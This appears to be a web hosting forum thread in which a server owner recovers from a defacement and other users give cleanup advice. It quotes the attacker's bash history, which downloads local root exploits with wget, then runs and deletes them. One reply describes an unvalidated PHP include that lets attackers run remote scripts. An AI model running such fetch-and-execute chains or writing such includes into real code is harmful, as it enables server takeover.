HELP Directadmin has been hacked!

L

ljweb

Verified User
Joined
Mar 31, 2005
Messages
51
I just got hacked:

_RockLee was here! ( ex-xc0d3r3d) .//Hack0S Securty Solutions ; Brazilian Team

I cant login into directadmin, and apache wont respond... what do i do?
 
If that is showing up on all webpages then I would place my odds on another service have being hacked on not DirectAdmin. Although it's entirely possible I haven't heard anything of it happening through DirectAdmin, always through a different service.

Can you login via ssh? If not the only way to check if you lost everything is direct console access, and even that won't work if the root password has been changed.
If you don't have direct access you will need to get your datacenter technician to do it for you.
 
It only displays that when login in via directadmin via :2222 . apache stopped working, it wont start up. Trying to rebuild it now.
 
It wont build, this is the error:


/usr/bin/ld: cannot find -lltdl
collect2: ld returned 1 exit status
make: *** [libphp4.la] Error 1


well i got apache going without php now.. however every index.html/index.htm/index.php has been replaced by the hackers sig.. this includes any directadmin files.. is there anyway of replacing the hacked directadmin files?

Am i able to reinstall directadmin on top of the existing installation to fix it?
 
Last edited:
thanks, you're a life saver!.. there was already a update tar file there which i installed and fixed up DA.
 
DirectAdmin uses normal html files in it's theme so at least the themes would have been affected by the hacker, or more likely his script.
 
yep, any file with the word index,default,home etc was hacked. I found iroffer in the /tmp folder, it was hidden in a folder called ... .It was owned by apache.
I removed it and took execute permissions off the temp folder.

how would it be possible for someone to get iroffer into the tmp folder? would this have to be done via a hole in a php script?
 
ljweb said:
yep, any file with the word index,default,home etc was hacked. I found iroffer in the /tmp folder, it was hidden in a folder called ... .It was owned by apache.
I removed it and took execute permissions off the temp folder.

how would it be possible for someone to get iroffer into the tmp folder? would this have to be done via a hole in a php script?
Click to expand...
Easy: have a user that has a part of php like:
include($page);
Without any validation of what $page contains. Furthermore, if you do this without register_globals, you have exactly what those script kiddies are looking for. A way to execute a part of a script.
Than they make sure to lead the server to a prepared php page that wgets (most of them don't know any other way) a .tar.gz into your /tmp, than creates a dir in /tmp, after that it extracts the specially prepared iroffer into that dir and starts it.
If they are really lame, they leave a script somewhere that defaces sites...

(have had to deal with scriptkiddies before...)
 
Well, there are more way's in than only including the $page variable. But it's the most common way in I know.

Did that /tmp thingy require an reboot ?
I've not installed it here myself as I am kinda against rebooting servers that are running nicely.

edit: :eek: Reading is hard, don't answer my last question, I already know the answer... (it's right there in the article)
 
No, doesnt require the reboot, you can manually mount it.
You also need to add it to /etc/fstab/ so it mounts automatically on the next reboot.
 
Well i found the bash_history file with what was run:

id
df -h
w
uptime
uname -a
ps -x
pwd
cd /tmp/.php
cd /tmp
ls -la
cd ...
ls
wget http://www.xhide
chmod 777 xhide
wget http://iroffer.org/archive/v1.4/iroffer1.4.b02.tgz
tar -zxf iroffer1.4.b02.tgz
ls
cd iroffer1.4.b02
cd ..
wget http://www./local24
chmod local24;./local24
./local24
rm -rf local24
wget http://www./mremap_pte;chmod +x mremap_pte;./mremap_pte
rm -rf mr*
wget http://www./w00t;chmod 777 w00t;./w00t
rm -rf w00t
wget http://www.brk2;chmod 777 brk2;./brk2
rm -rf brk2
wget http://www.uselib24;chmod 777 uselib24;./uselib24;./uselib24;./uselib24;./uselib24

i wont post the actual address of where the scripts came from, probably give someone ideas.. what kind of access would someone need to be able to do this?
 
Last edited:
Hi,

Try to use chkrootkit to check for some known rootkits installed. Most of them installas a patched ps,ls and many others programs so You cant find anything unusual.

Kind Regards,
 
Unless you are fully sure you havent been root compromised I would do a box format and restore.
 
qlsys said:
Hi,

Try to use chkrootkit to check for some known rootkits installed. Most of them installas a patched ps,ls and many others programs so You cant find anything unusual.

Kind Regards,
Click to expand...

Yep, already done that. I've installed chkrootkit and rkhunter and run both, everything comes up clean, tells me i should update a couple of things too.

I spent the last day going through everything and have removed all the suspicious files, even the extra user that they created .

I've since installed APF too, seems to be working well. I had no idea of how many attempts there are at connecting to different udp/tcp ports on my box!, mainly from China and Amsterdam..
 
You must log in or register to reply here.
Back
Top